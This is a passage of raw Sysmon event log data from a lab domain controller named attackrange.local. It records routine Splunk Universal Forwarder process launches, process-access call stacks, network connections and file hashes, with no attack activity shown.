Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002201949Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:17.411{5ABCFE62-E82D-6040-134E-00000000AD01}3040C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000002201948Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:11.931{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60594-false10.0.1.12-8000- 23542300x80000000000000002201947Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:17.176{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=10E3D6EB8851BC6DCC7C80088227843C,SHA256=FFBFD84B3E538C42BD0C346992F24BD98208ADEF953A1E1AF76B2D42B4F8CC5F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002201976Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:18.879{5ABCFE62-E82E-6040-154E-00000000AD01}50926748C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201975Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:18.754{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E82E-6040-154E-00000000AD01}5092C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201974Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:18.754{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201973Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:18.754{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201972Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:18.754{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201971Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:18.754{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201970Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:18.754{5ABCFE62-842D-603E-0500-00000000AD01}416340C:\Windows\system32\csrss.exe{5ABCFE62-E82E-6040-154E-00000000AD01}5092C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002201969Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:18.754{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E82E-6040-154E-00000000AD01}5092C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002201968Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:18.755{5ABCFE62-E82E-6040-154E-00000000AD01}5092C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002201967Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:18.410{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2E97BFBE5B00623073C99061B82DC9FD,SHA256=FCDEDF1630319907CCE8E1CECBEF164DD8A6D64D17BCB5FE658D948960E4F167,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201966Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:18.192{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6CDA1ECA022FCD951F6502CBB2ED9DB1,SHA256=9949BB19662210861549909B6C8910150F1CD53EE1EBFB09855F05025B8A5D00,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002201965Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:18.082{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E82E-6040-144E-00000000AD01}4616C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201964Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:18.082{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201963Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:18.082{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201962Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:18.082{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201961Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:18.082{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201960Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:18.082{5ABCFE62-842D-603E-0500-00000000AD01}416432C:\Windows\system32\csrss.exe{5ABCFE62-E82E-6040-144E-00000000AD01}4616C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002201959Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:18.082{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E82E-6040-144E-00000000AD01}4616C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002201958Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:18.083{5ABCFE62-E82E-6040-144E-00000000AD01}4616C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002201988Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:19.832{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=54979F27BE675F790D34CEB10A091AA7,SHA256=A3E3ABF86333C9587BDB5F08628980B5C27BB348544DDFA997F02E2B30D53225,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002201987Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:19.551{5ABCFE62-E82F-6040-164E-00000000AD01}68042988C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x80000000000000002201986Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:15.965{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local53280- 10341000x80000000000000002201985Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:19.426{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E82F-6040-164E-00000000AD01}6804C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201984Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:19.426{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201983Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:19.426{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201982Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:19.426{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201981Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:19.426{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201980Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:19.426{5ABCFE62-842D-603E-0500-00000000AD01}416532C:\Windows\system32\csrss.exe{5ABCFE62-E82F-6040-164E-00000000AD01}6804C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002201979Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:19.426{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E82F-6040-164E-00000000AD01}6804C:\Program 